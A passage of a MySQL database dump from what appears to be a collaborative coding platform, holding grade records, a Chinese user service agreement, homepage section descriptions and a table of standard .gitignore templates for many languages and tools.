INSERT INTO `grades` VALUES (1,1,1,'Account',500,'2018-07-06 09:20:57','2018-07-06 09:20:57'),(2,1,1,'Phone',500,'2018-07-06 09:21:26','2018-07-06 09:21:26'),(3,3,3,'Phone',500,'2018-07-06 10:52:18','2018-07-06 10:52:18'),(4,3,3,'Account',500,'2018-07-06 10:52:50','2018-07-06 10:52:50'),(5,4,4,'Phone',500,'2018-07-08 10:28:20','2018-07-08 10:28:20'),(6,4,4,'Account',500,'2018-07-08 10:30:44','2018-07-08 10:30:44'),(7,1,1,'Avatar',100,'2018-07-10 16:42:15','2018-07-10 16:42:15'),(8,1,26,'Memo',1,'2018-08-02 17:11:16','2018-08-02 17:11:16'),(9,50,184,'Memo',100,'2019-08-08 15:43:17','2019-08-08 15:43:17'),(10,50,185,'Memo',100,'2019-08-08 15:53:48','2019-08-08 15:53:48');
|
||
/*!40000 ALTER TABLE `grades` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `helps`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `helps`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `helps` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`about_us` text,
|
||
`agreement` text,
|
||
`status` text,
|
||
`help_center` text,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `helps`
|
||
--
|
||
|
||
LOCK TABLES `helps` WRITE;
|
||
/*!40000 ALTER TABLE `helps` DISABLE KEYS */;
|
||
INSERT INTO `helps` VALUES (1,'2018-07-27 10:03:44','2018-07-27 10:03:44',NULL,'尊敬的用户,您好!\r\n欢迎使用本网站,在您使用本网站前,请您认真阅读并遵守《服务协议》(以下简称\"本协议\"),请您务必审慎阅读、充分理解协议的各条款内容。\r\n当您在注册过程中点击查看\"看过并同意本服务协议\",按照注册流程成功注册为网站的用户即表示您已充分阅读、理解并完全接受本协议中的全部条款。您承诺接受并遵守本协议的约定,届时您不应以未阅读本协议的内容等理由,主张本协议无效或本协议中的某些条款无效,或要求撤销本协议。\r\n\r\n###### 本网站权利和义务\r\n\r\n1. 尊重用户隐私:尊重用户隐私,保障用户隐私安全是网站的一项基本政策;\r\n2. 管理网站用户:网站依据国家法律、地方法律和国际法律等的标准以及本行业的规则来管理网站注册用户;\r\n3. 处理用户反馈:网站的相关人员会及时处理用户反馈的问题并给予及时回复。\r\n\r\n###### 用户权利和义务\r\n\r\n1. 用户在使用网站的过程中,必须遵守如下原则:\r\n2. 遵守中国的有关法律和法规;\r\n3. 使用网络服务不作非法用途;\r\n4. 不干扰和混乱网络服务;\r\n5. 遵守所有使用网络服务的网络协议、规定、程序和惯例;\r\n6. 不传输任何非法的、骚扰性的、中伤他人的、辱骂性的、恐吓性的、伤害性的、庸俗的,淫秽等信息资料;\r\n7. 不传输任何教唆他人构成犯罪行为的资料;\r\n8. 用户不得故意或者过失损害网站合法权利和利益。及时回复。\r\n\r\n###### 关于责任\r\n\r\n鉴于网络服务的特殊性,本网站有权在事先通知的情况下,变更、中断、升级部分网络服务。本网站不担保网络服务不会中断,但承诺在用户可承受的时间内快速恢复服务,同时确保用户数据的安全性和可靠性。\r\n\r\n###### 免责条款\r\n鉴于互联网服务的特点,本网站对用户自行上传的资料不承担任何法律责任,希望各网友对网站提供的互动服务中的内容进行监督,若发现存在侵犯任何第三人著作权等合法权益的内容,请及时告知,我们将严格按照《信息网络传播权保护条例》中的规定予以删除。\r\n\r\n1. 本网站属于非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请来信告知:XXXXXXXX@163.com\r\n2. 本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。\r\n3. 任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。\r\n4. 本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。\r\n\r\n###### 侵权投诉\r\nEducoder平台是一个接受外来投稿的平台,部分图片和文字来自互联网或原作者自行编辑。投稿到Educoder平台的文章,默认作者授权其全部图文内容在Educoder平台、在其微信公众号及微博帐号进行发布,Educoder平台对这一部分内容不进行预先审查。\r\n如您发现平台上文章或图片涉嫌侵犯您的权利请您将所涉及的文章 URL 和侵权理由以邮件形式发送到邮箱(XXXXXXXX@163.com),我们将在核实情况后依照《中华人民共和国侵权责任法》及其司法解释对内容进行屏蔽、删除和通知原作者。\r\n\r\n###### 服务条款的修改\r\n\r\n本网站保留在必要时对本协议修改的权利,一旦发生变动,这些条款可由网站项目组及时更新,且毋须另行通知,修改后的条款一旦在网页上公布即有效代替原来的服务条款。您可随时查阅最新版服务条款。\r\n\r\n本协议最终解释权归本网站所有。',NULL,NULL);
|
||
/*!40000 ALTER TABLE `helps` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `home_sections`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `home_sections`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `home_sections` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`link` varchar(255) DEFAULT NULL,
|
||
`cover_url` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`attachment_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `home_sections`
|
||
--
|
||
|
||
LOCK TABLES `home_sections` WRITE;
|
||
/*!40000 ALTER TABLE `home_sections` DISABLE KEYS */;
|
||
INSERT INTO `home_sections` VALUES (5,1,'开源项目','一个集项目托管、协同攻关、贡献汇聚、概念推演、集成部署与测试的应用系统。按照开源协议管理资源和成果,并提供大规模在线协同开发工具','https://forge.osredm.com/projects','/attachments/download/1193','2020-08-20 10:54:06','2021-03-04 10:57:19',1193),(6,1,'创客空间','针对特定问题面向大众征集创意和解决问题的思路、方法或成熟的成果,并筛选优秀项目进行孵化。通过网络向社会上所有富有创造力的大脑征集创意、概念,为创新和科研工作寻找方向,形成前瞻性需求,推动实现创新驱动发展。','/tasks/list','/attachments/download/1197','2020-08-20 11:51:59','2020-08-21 10:34:12',1197),(7,1,'竞赛活动','为应用单位开展不同专业技术方向、不同范围的竞赛提供平台支持和运营支持。面向特定专业方向发现和选拔人才。开放竞赛和相关活动既可以由用户提出后由平台负责策划组织,也可以由用户基于平台的基础服务支撑自行策划组织。','/competitions','/attachments/download/1198','2020-08-20 11:52:49','2020-08-20 11:52:49',1198),(8,1,'论坛交流','理论和技术的交流空间,致力于实现众智汇聚、跨界交流与协同实践,加速理技融合和迭代创新。','/forums','/attachments/download/1199','2020-08-20 11:53:29','2020-08-20 11:53:29',1199);
|
||
/*!40000 ALTER TABLE `home_sections` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ignores`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ignores`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ignores` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=190 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ignores`
|
||
--
|
||
|
||
LOCK TABLES `ignores` WRITE;
|
||
/*!40000 ALTER TABLE `ignores` DISABLE KEYS */;
|
||
INSERT INTO `ignores` VALUES (1,'Clojure','pom.xml\npom.xml.asc\n*.jar\n*.class\n/lib/\n/classes/\n/target/\n/checkouts/\n.lein-deps-sum\n.lein-repl-history\n.lein-plugins/\n.lein-failures\n.nrepl-port\n.cpcache/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(2,'SugarCRM','## SugarCRM\n# Ignore custom .htaccess stuff.\n/.htaccess\n# Ignore the cache directory completely.\n# This will break the current behaviour. Which was often leading to\n# the misuse of the repository as backup replacement.\n# For development the cache directory can be safely ignored and\n# therefore it is ignored.\n/cache/*\n!/cache/index.html\n# Ignore some files and directories from the custom directory.\n/custom/history/\n/custom/modulebuilder/\n/custom/working/\n/custom/modules/*/Ext/\n/custom/application/Ext/\n# Custom configuration should also be ignored.\n/config.php\n/config_override.php\n# The silent upgrade scripts aren\'t needed.\n/silentUpgrade*.php\n# Logs files can safely be ignored.\n*.log\n# Ignore the new upload directories.\n/upload/*\n!/upload/index.html\n/upload_backup/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(3,'FlexBuilder','bin/\nbin-debug/\nbin-release/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(4,'Lilypond','*.pdf\n*.ps\n*.midi\n*.mid\n*.log\n*~\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(5,'VirtualEnv','# Virtualenv\n# http://iamzed.com/2009/05/07/a-primer-on-virtualenv/\n.Python\n[Bb]in\n[Ii]nclude\n[Ll]ib\n[Ll]ib64\n[Ll]ocal\n[Ss]cripts\npyvenv.cfg\n.venv\npip-selfcheck.json\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(6,'AppceleratorTitanium','# Build folder and log file\nbuild/\nbuild.log\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(7,'Eagle','# Ignore list for Eagle, a PCB layout tool\n\n# Backup files\n*.s#?\n*.b#?\n*.l#?\n*.b$?\n*.s$?\n*.l$?\n\n# Eagle project file\n# It contains a serial number and references to the file structure\n# on your computer.\n# comment the following line if you want to have your project file included.\neagle.epf\n\n# Autorouter files\n*.pro\n*.job\n\n# CAM files\n*.$$$\n*.cmp\n*.ly2\n*.l15\n*.sol\n*.plc\n*.stc\n*.sts\n*.crc\n*.crs\n\n*.dri\n*.drl\n*.gpi\n*.pls\n*.ger\n*.xln\n\n*.drd\n*.drd.*\n\n*.s#*\n*.b#*\n\n*.info\n\n*.eps\n\n# file locks introduced since 7.x\n*.lck\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(8,'Vim','# Swap\n[._]*.s[a-v][a-z]\n[._]*.sw[a-p]\n[._]s[a-rt-v][a-z]\n[._]ss[a-gi-z]\n[._]sw[a-p]\n\n# Session\nSession.vim\n\n# Temporary\n.netrwhist\n*~\n# Auto-generated tag files\ntags\n# Persistent undo\n[._]*.un~\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(9,'Composer','composer.phar\n/vendor/\n\n# Commit your application\'s lock file https://getcomposer.org/doc/01-basic-usage.md#commit-your-composer-lock-file-to-version-control\n# You may choose to ignore a library lock file http://getcomposer.org/doc/02-libraries.md#lock-file\n# composer.lock\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(10,'UnrealEngine','# Visual Studio 2015 user specific files\n.vs/\n\n# Compiled Object files\n*.slo\n*.lo\n*.o\n*.obj\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Compiled Dynamic libraries\n*.so\n*.dylib\n*.dll\n\n# Fortran module files\n*.mod\n\n# Compiled Static libraries\n*.lai\n*.la\n*.a\n*.lib\n\n# Executables\n*.exe\n*.out\n*.app\n*.ipa\n\n# These project files can be generated by the engine\n*.xcodeproj\n*.xcworkspace\n*.sln\n*.suo\n*.opensdf\n*.sdf\n*.VC.db\n*.VC.opendb\n\n# Precompiled Assets\nSourceArt/**/*.png\nSourceArt/**/*.tga\n\n# Binary Files\nBinaries/*\nPlugins/*/Binaries/*\n\n# Builds\nBuild/*\n\n# Whitelist PakBlacklist-<BuildConfiguration>.txt files\n!Build/*/\nBuild/*/**\n!Build/*/PakBlacklist*.txt\n\n# Don\'t ignore icon files in Build\n!Build/**/*.ico\n\n# Built data for maps\n*_BuiltData.uasset\n\n# Configuration files generated by the Editor\nSaved/*\n\n# Compiled source files for the engine to use\nIntermediate/*\nPlugins/*/Intermediate/*\n\n# Cache files for the editor to use\nDerivedDataCache/*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(11,'Maven','target/\npom.xml.tag\npom.xml.releaseBackup\npom.xml.versionsBackup\npom.xml.next\nrelease.properties\ndependency-reduced-pom.xml\nbuildNumber.properties\n.mvn/timing.properties\n.mvn/wrapper/maven-wrapper.jar\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(12,'ROS','devel/\nlogs/\nbuild/\nbin/\nlib/\nmsg_gen/\nsrv_gen/\nmsg/*Action.msg\nmsg/*ActionFeedback.msg\nmsg/*ActionGoal.msg\nmsg/*ActionResult.msg\nmsg/*Feedback.msg\nmsg/*Goal.msg\nmsg/*Result.msg\nmsg/_*.py\nbuild_isolated/\ndevel_isolated/\n\n# Generated by dynamic reconfigure\n*.cfgc\n/cfg/cpp/\n/cfg/*.py\n\n# Ignore generated docs\n*.dox\n*.wikidoc\n\n# eclipse stuff\n.project\n.cproject\n\n# qcreator stuff\nCMakeLists.txt.user\n\nsrv/_*.py\n*.pcd\n*.pyc\nqtcreator-*\n*.user\n\n/planning/cfg\n/planning/docs\n/planning/src\n\n*~\n\n# Emacs\n.#*\n\n# Catkin custom files\nCATKIN_IGNORE\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(13,'Gradle','.gradle\n/build/\n\n# Ignore Gradle GUI config\ngradle-app.setting\n\n# Avoid ignoring Gradle wrapper jar file (.jar files are usually ignored)\n!gradle-wrapper.jar\n\n# Cache of project\n.gradletasknamecache\n\n# # Work around https://youtrack.jetbrains.com/issue/IDEA-116898\n# gradle/wrapper/gradle-wrapper.properties\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(14,'Drupal','# Ignore configuration files that may contain sensitive information.\nsites/*/*settings*.php\nsites/example.sites.php\n\n# Ignore paths that contain generated content.\nfiles/\nsites/*/files\nsites/*/private\nsites/*/translations\n\n# Ignore default text files\nrobots.txt\n/CHANGELOG.txt\n/COPYRIGHT.txt\n/INSTALL*.txt\n/LICENSE.txt\n/MAINTAINERS.txt\n/UPGRADE.txt\n/README.txt\nsites/README.txt\nsites/all/libraries/README.txt\nsites/all/modules/README.txt\nsites/all/themes/README.txt\n\n# Ignore everything but the \"sites\" folder ( for non core developer )\n.htaccess\nweb.config\nauthorize.php\ncron.php\nindex.php\ninstall.php\nupdate.php\nxmlrpc.php\n/includes\n/misc\n/modules\n/profiles\n/scripts\n/themes\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(15,'PlayFramework','# Ignore Play! working directory #\nbin/\n/db\n.eclipse\n/lib/\n/logs/\n/modules\n/project/project\n/project/target\n/target\ntmp/\ntest-result\nserver.pid\n*.eml\n/dist/\n.cache\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(16,'AppEngine','# Google App Engine generated folder\nappengine-generated/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(17,'CUDA','*.i\n*.ii\n*.gpu\n*.ptx\n*.cubin\n*.fatbin\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(18,'Stata','# .gitignore file for git projects containing Stata files\n# Commercial statistical software: http://www.stata.com\n\n# Stata dataset and output files\n*.dta\n*.gph\n*.log\n*.smcl\n*.stpr\n*.stsem\n\n# Graphic export files from Stata\n# Stata command graph export: http://www.stata.com/manuals14/g-2graphexport.pdf\n#\n# You may add graphic export files to your .gitignore. However you should be\n# aware that this will exclude all image files from this main directory\n# and subdirectories.\n# *.ps\n# *.eps\n# *.wmf\n# *.emf\n# *.pdf\n# *.png\n# *.tif\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(19,'Lithium','libraries/*\nresources/tmp/*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(20,'Finale','*.bak\n*.db\n*.avi\n*.pdf\n*.ps\n*.mid\n*.midi\n*.mp3\n*.aif\n*.wav\n# Some versions of Finale have a bug and randomly save extra copies of\n# the music source as \"<Filename> copy.mus\"\n*copy.mus\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(21,'Erlang','.eunit\ndeps\n*.o\n*.beam\n*.plt\nerl_crash.dump\nebin/*.beam\nrel/example_project\n.concrete/DEV_MODE\n.rebar\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(22,'CodeIgniter','*/config/development\n*/logs/log-*.php\n!*/logs/index.html\n*/cache/*\n!*/cache/index.html\n!*/cache/.htaccess\n\nuser_guide_src/build/*\nuser_guide_src/cilexer/build/*\nuser_guide_src/cilexer/dist/*\nuser_guide_src/cilexer/pycilexer.egg-info/*\n\n#codeigniter 3\napplication/logs/*\n!application/logs/index.html\n!application/logs/.htaccess\n/vendor/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(23,'MonoDevelop','#User Specific\n*.userprefs\n*.usertasks\n\n#Mono Project Files\n*.pidb\n*.resources\ntest-results/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(24,'PureScript','# Dependencies\n.psci_modules\nbower_components\nnode_modules\n\n# Generated files\n.psci\noutput\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(25,'Swift','# Xcode\n#\n# gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore\n\n## Build generated\nbuild/\nDerivedData/\n\n## Various settings\n*.pbxuser\n!default.pbxuser\n*.mode1v3\n!default.mode1v3\n*.mode2v3\n!default.mode2v3\n*.perspectivev3\n!default.perspectivev3\nxcuserdata/\n\n## Other\n*.moved-aside\n*.xccheckout\n*.xcscmblueprint\n\n## Obj-C/Swift specific\n*.hmap\n*.ipa\n*.dSYM.zip\n*.dSYM\n\n## Playgrounds\ntimeline.xctimeline\nplayground.xcworkspace\n\n# Swift Package Manager\n#\n# Add this line if you want to avoid checking in source code from Swift Package Manager dependencies.\n# Packages/\n# Package.pins\n# Package.resolved\n.build/\n\n# CocoaPods\n#\n# We recommend against adding the Pods directory to your .gitignore. However\n# you should judge for yourself, the pros and cons are mentioned at:\n# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control\n#\n# Pods/\n#\n# Add this line if you want to avoid checking in source code from the Xcode workspace\n# *.xcworkspace\n\n# Carthage\n#\n# Add this line if you want to avoid checking in source code from Carthage dependencies.\n# Carthage/Checkouts\n\nCarthage/Build\n\n# fastlane\n#\n# It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the\n# screenshots whenever they are needed.\n# For more information about the recommended setup visit:\n# https://docs.fastlane.tools/best-practices/source-control/#source-control\n\nfastlane/report.xml\nfastlane/Preview.html\nfastlane/screenshots/**/*.png\nfastlane/test_output\n\n# Code Injection\n#\n# After new code Injection tools there\'s a generated folder /iOSInjectionProject\n# https://github.com/johnno1962/injectionforxcode\n\niOSInjectionProject/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(26,'SynopsysVCS','# Waveform formats\n*.vcd\n*.vpd\n*.evcd\n*.fsdb\n\n# Default name of the simulation executable. A different name can be\n# specified with this switch (the associated daidir database name is\n# also taken from here): -o <path>/<filename>\nsimv\n\n# Generated for Verilog and VHDL top configs\nsimv.daidir/\nsimv.db.dir/\n\n# Infrastructure necessary to co-simulate SystemC models with\n# Verilog/VHDL models. An alternate directory may be specified with this\n# switch: -Mdir=<directory_path>\ncsrc/\n\n# Log file - the following switch allows to specify the file that will be\n# used to write all messages from simulation: -l <filename>\n*.log\n\n# Coverage results (generated with urg) and database location. The\n# following switch can also be used: urg -dir <coverage_directory>.vdb\nsimv.vdb/\nurgReport/\n\n# DVE and UCLI related files.\nDVEfiles/\nucli.key\n\n# When the design is elaborated for DirectC, the following file is created\n# with declarations for C/C++ functions.\nvc_hdrs.h\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(27,'MicrosoftOffice','*.tmp\n\n# Word temporary\n~$*.doc*\n\n# Word Auto Backup File\nBackup of *.doc*\n\n# Excel temporary\n~$*.xls*\n\n# Excel Backup File\n*.xlk\n\n# PowerPoint temporary\n~$*.ppt*\n\n# Visio autosave temporary files\n*.~vsd*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(28,'Packer','# Cache objects\npacker_cache/\n\n# For built boxes\n*.box\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(29,'Scala','*.class\n*.log\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(30,'Concrete5','config/site.php\nfiles/cache/*\nfiles/tmp/*\n.htaccess\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(31,'CMake','CMakeCache.txt\nCMakeFiles\nCMakeScripts\nTesting\nMakefile\ncmake_install.cmake\ninstall_manifest.txt\ncompile_commands.json\nCTestTestfile.cmake\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(32,'LyX','# Ignore LyX backup and autosave files\n# http://www.lyx.org/\n*.lyx~\n*.lyx#\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(33,'Vagrant','# General\n.vagrant/\n\n# Log files (if you are creating logs in debug mode, uncomment this)\n# *.logs\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(34,'Jboss','jboss/server/all/deploy/project.ext\njboss/server/default/deploy/project.ext\njboss/server/minimal/deploy/project.ext\njboss/server/all/log/*.log\njboss/server/all/tmp/**/*\njboss/server/all/data/**/*\njboss/server/all/work/**/*\njboss/server/default/log/*.log\njboss/server/default/tmp/**/*\njboss/server/default/data/**/*\njboss/server/default/work/**/*\njboss/server/minimal/log/*.log\njboss/server/minimal/tmp/**/*\njboss/server/minimal/data/**/*\njboss/server/minimal/work/**/*\n\n# deployed package files #\n\n*.DEPLOYED\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(35,'Objective-C','# Xcode\n#\n# gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore\n\n## Build generated\nbuild/\nDerivedData/\n\n## Various settings\n*.pbxuser\n!default.pbxuser\n*.mode1v3\n!default.mode1v3\n*.mode2v3\n!default.mode2v3\n*.perspectivev3\n!default.perspectivev3\nxcuserdata/\n\n## Other\n*.moved-aside\n*.xccheckout\n*.xcscmblueprint\n\n## Obj-C/Swift specific\n*.hmap\n*.ipa\n*.dSYM.zip\n*.dSYM\n\n# CocoaPods\n#\n# We recommend against adding the Pods directory to your .gitignore. However\n# you should judge for yourself, the pros and cons are mentioned at:\n# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control\n#\n# Pods/\n#\n# Add this line if you want to avoid checking in source code from the Xcode workspace\n# *.xcworkspace\n\n# Carthage\n#\n# Add this line if you want to avoid checking in source code from Carthage dependencies.\n# Carthage/Checkouts\n\nCarthage/Build\n\n# fastlane\n#\n# It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the\n# screenshots whenever they are needed.\n# For more information about the recommended setup visit:\n# https://docs.fastlane.tools/best-practices/source-control/#source-control\n\nfastlane/report.xml\nfastlane/Preview.html\nfastlane/screenshots/**/*.png\nfastlane/test_output\n\n# Code Injection\n#\n# After new code Injection tools there\'s a generated folder /iOSInjectionProject\n# https://github.com/johnno1962/injectionforxcode\n\niOSInjectionProject/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(36,'Scrivener','/Files/binder.autosave\n/Files/binder.backup\n/Files/search.indexes\n/Files/user.lock\n/Files/Docs/docs.checksum\n/QuickLook/\n/Settings/ui.plist\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(37,'CraftCMS','# Craft 2 Storage (https://craftcms.com/support/craft-storage-gitignore)\n# not necessary for Craft 3 (https://github.com/craftcms/craft/issues/26)\n/craft/storage/*\n!/craft/storage/rebrand\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(38,'Autotools','# http://www.gnu.org/software/automake\n\nMakefile.in\n/ar-lib\n/mdate-sh\n/py-compile\n/test-driver\n/ylwrap\n\n# http://www.gnu.org/software/autoconf\n\nautom4te.cache\n/autoscan.log\n/autoscan-*.log\n/aclocal.m4\n/compile\n/config.guess\n/config.h.in\n/config.log\n/config.status\n/config.sub\n/configure\n/configure.scan\n/depcomp\n/install-sh\n/missing\n/stamp-h1\n\n# https://www.gnu.org/software/libtool/\n\n/ltmain.sh\n\n# http://www.gnu.org/software/texinfo\n\n/texinfo.tex\n\n# http://www.gnu.org/software/m4/\n\nm4/libtool.m4\nm4/ltoptions.m4\nm4/ltsugar.m4\nm4/ltversion.m4\nm4/lt~obsolete.m4\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(39,'Fancy','*.rbc\n*.fyc\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(40,'SeamGen','/bootstrap/data\n/bootstrap/tmp\n/classes/\n/dist/\n/exploded-archives/\n/test-build/\n/test-output/\n/test-report/\n/target/\ntemp-testng-customsuite.xml\n\n# based on http://stackoverflow.com/a/8865858/422476 I am removing inline comments\n\n#/classes/ all class files\n#/dist/ contains generated war files for deployment\n#/exploded-archives/ war content generation during deploy (or explode)\n#/test-build/ test compilation (ant target for Seam)\n#/test-output/ test results\n#/test-report/ test report generation for, e.g., Hudson\n#/target/ maven output folder\n#temp-testng-customsuite.xml generated when running test cases under Eclipse\n\n# Thanks to @VonC and @kraftan for their helpful answers on a related question\n# on StackOverflow.com:\n# http://stackoverflow.com/questions/4176687\n# /what-is-the-recommended-source-control-ignore-pattern-for-seam-projects\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(41,'Phalcon','/cache/\n/config/development/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(42,'Elm','# elm-package generated files\nelm-stuff\n# elm-repl generated files\nrepl-temp-*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(43,'Haskell','dist\ndist-*\ncabal-dev\n*.o\n*.hi\n*.chi\n*.chs.h\n*.dyn_o\n*.dyn_hi\n.hpc\n.hsenv\n.cabal-sandbox/\ncabal.sandbox.config\n*.prof\n*.aux\n*.hp\n*.eventlog\n.stack-work/\ncabal.project.local\ncabal.project.local~\n.HTF/\n.ghc.environment.*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(44,'GitBook','# Node rules:\n## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)\n.grunt\n\n## Dependency directory\n## Commenting this out is preferred by some people, see\n## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git\nnode_modules\n\n# Book build output\n_book\n\n# eBook build output\n*.epub\n*.mobi\n*.pdf\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(45,'Sass','.sass-cache/\n*.css.map\n*.sass.map\n*.scss.map\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(46,'Actionscript','# Build and Release Folders\nbin-debug/\nbin-release/\n[Oo]bj/\n[Bb]in/\n\n# Other files and folders\n.settings/\n\n# Executables\n*.swf\n*.air\n*.ipa\n*.apk\n\n# Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties`\n# should NOT be excluded as they contain compiler settings and other important\n# information for Eclipse / Flash Builder.\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(47,'SBT','# Simple Build Tool\n# http://www.scala-sbt.org/release/docs/Getting-Started/Directories.html#configuring-version-control\n\ndist/*\ntarget/\nlib_managed/\nsrc_managed/\nproject/boot/\nproject/plugins/project/\n.history\n.cache\n.lib/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(48,'JEnv','# JEnv local Java version configuration file\n.java-version\n\n# Used by previous versions of JEnv\n.jenv-version\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(49,'OracleForms','# Compiled Form Modules\n*.fmx\n\n# Compiled Menu Modules\n*.mmx\n\n# Compiled Pre-Linked Libraries\n*.plx\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(50,'LemonStand','boot.php\nindex.php\ninstall.php\n/config/*\n!/config/config.php\n/controllers/*\n/init/*\n/logs/*\n/phproad/*\n/temp/*\n/uploaded/*\n/installer_files/*\n/modules/backend/*\n/modules/blog/*\n/modules/cms/*\n/modules/core/*\n/modules/session/*\n/modules/shop/*\n/modules/system/*\n/modules/users/*\n# add content_*.php if you don\'t want erase client changes to content\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(51,'Python','# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\n*.egg-info/\n.installed.cfg\n*.egg\nMANIFEST\n\n# PyInstaller\n# Usually these files are written by a python script from a template\n# before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer 